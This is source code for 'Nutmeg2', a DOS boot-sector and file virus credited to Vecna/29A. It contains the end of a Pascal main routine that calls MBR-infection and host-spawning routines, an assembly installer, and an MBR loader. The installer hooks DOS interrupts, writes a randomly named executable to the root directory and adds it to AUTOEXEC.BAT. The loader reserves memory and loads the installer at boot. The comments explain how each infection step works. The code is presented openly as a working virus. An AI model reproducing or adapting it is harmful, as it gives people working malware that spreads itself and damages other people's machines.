00, 00, 00, 00, 00, 00, 00, 00, 00, 00 DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00 DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00 DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00 DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00 DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00 DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00 DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00 DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00 DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00 DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00 DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00 DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00 DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00 DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00 DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00 DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00 DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00 DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00 DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00 DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00 DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00 DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00 DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00 @OVERBUFFER: POP DS END; END; BEGIN INITALL; INFECTMBR; SPAWNHOST; IF NOT(RESIDENT) THEN BEGIN MEML[$0:$350]:=$20FF20FF; SETINTVEC($28,@VIRUSINT28); KEEP(0); END; END. ;(Cut here)------------------------------------------------------------------- ;[Nutmeg2] virus by Vecna/29A ;Installer ; ;These routines add to the AUTOEXEC.BAT a random named virus sample, and ;write this virus sample to the root dir. To do this, it hook interrupt 0x1C, ;wait for DOS load and hook interrupt 0x21. This hook wait for a file execute ;and then read the virus code and write it to the disk as a file, and then ;modify AUTOEXEC.BAT to execute this file. All interrupts hook are restored ;after use, and only 1 kilobyte is subtracted from memory. The virus sample ;is executed with a "!" as single parameter. This is done to warn the virus ;to disinfect AUTOEXEC.BAT. .MODEL TPASCAL .386P .CODE ORG 0 PUBLIC LOADER LOADER: MOV DI, OFFSET MUTATE-OFFSET LOADER MOV CX, 8 NCHAR: IN AL, 40H AND AL, 01111B ADD AL, 'A' DB 2EH STOSB LOOP NCHAR PUSH 0 POP DS MOV AX, OFFSET INT1C-OFFSET LOADER MOV SI, 1CH*4 MOV DI, OFFSET OLD1C-OFFSET LOADER CLD CLI XCHG AX, WORD PTR DS:[SI] DB 2EH STOSW MOV AX, CS XCHG AX, WORD PTR DS:[SI+2] DB 2EH STOSW STI XOR EAX, EAX MOV DWORD PTR DS:[21H*4], EAX MOV ES, AX MOV BX, 7C00H MOV AX, 201H MOV CX, 2 MOV DX, 80H INT 13H DB 0EAH DW 7C00H DW 0 INT1C: PUSH DS PUSHAD PUSH 0 POP DS MOV CX, WORD PTR DS:[21H*4+2] CMP CX, 800H JA NOT_YET JCXZ NOT_YET MOV ESI, 21H*4 MOV EDI, 0FFH*4 MOV EAX, DWORD PTR DS:[ESI] MOV DWORD PTR DS:[EDI], EAX MOV AX, CS ROL EAX, 16 MOV AX, OFFSET INT21-OFFSET LOADER MOV DWORD PTR DS:[ESI], EAX MOV EAX, DWORD PTR CS:[OLD1C-OFFSET LOADER] MOV DWORD PTR DS:[1CH*4], EAX NOT_YET: POPAD POP DS DB 0EAH OLD1C DD 0 INT21: PUSH DS PUSH ES PUSHAD ALL_PUSHED: PUSH 0 POP DS CMP AX, 4B00H JNE NO_4B00 EXECUTING: MOV EAX, DWORD PTR DS:[0FFH*4] MOV DWORD PTR DS:[21H*4], EAX MOV AX, CS SUB AX, 1000H MOV ES, AX MOV AX, 200H+(4096/512) XOR BX, BX MOV CX, 5 MOV DX, 80H INT 13H JC ERROR MOV AH, 3CH MOV CX, 10B PUSH CS POP DS MOV DX, OFFSET FNAME-OFFSET LOADER INT 21H JC ERROR XCHG AX, BX PUSH ES POP DS XOR DX, DX MOV AH, 40H MOV CX, 4096 INT 21H JC ERROR PUSH CS POP DS MOV AH, 3EH INT 21H MOV AX, 3D02H MOV DX, OFFSET FNAME2-OFFSET LOADER INT 21H JC ERROR XCHG AX, BX MOV AX, 4202H XOR CX, CX CWD INT 21H MOV AH, 40H MOV CX, FSIZE-1 MOV DX, OFFSET FNAME-OFFSET LOADER INT 21H JC ERROR MOV AH, 40H MOV CX, FSIZE2 MOV DX, OFFSET PARAMS-OFFSET LOADER INT 21H JC ERROR ERROR: MOV AH, 3EH INT 21H NO_4B00: POPAD POP ES POP DS INT 0FFH RETF 2 FNAME DB "C:\" MUTATE DB 8 DUP (0) DB ".EXE", 0 FSIZE EQU $-OFFSET FNAME PARAMS DB " !", 13, 10 FSIZE2 EQU $-OFFSET PARAMS FNAME2 DB 'AUTOEXEC.BAT', 0 END LOADER ;(Cut here)------------------------------------------------------------------- ;[Nutmeg2] virus by Vecna/29A ;MBR loader ; ;This piece of code reside in the MBR of a infected system. It just create a ;stack, steal one kilobyte from 0x0:0x413, and read and jump the installer ;in this hole. .MODEL TPASCAL .CODE ORG 0 PUBLIC MLOADER MLOADER: JMP SKIPMSG DB "[NUTMEG2] by Vecna/29A" SKIPMSG: CLI XOR BX, BX MOV SS, BX MOV SP, 7C00H STI PUSH BX POP DS DEC WORD PTR DS:[413H] INT 12H MOV CL, 6 SHL AX, CL PUSH AX POP ES MOV AX, 202H MOV CX, 3 MOV DX, 80H INT 13H JC $ PUSH ES PUSH BX RETF DB 'This virus was written in Brasil, in 1998' END MLOADER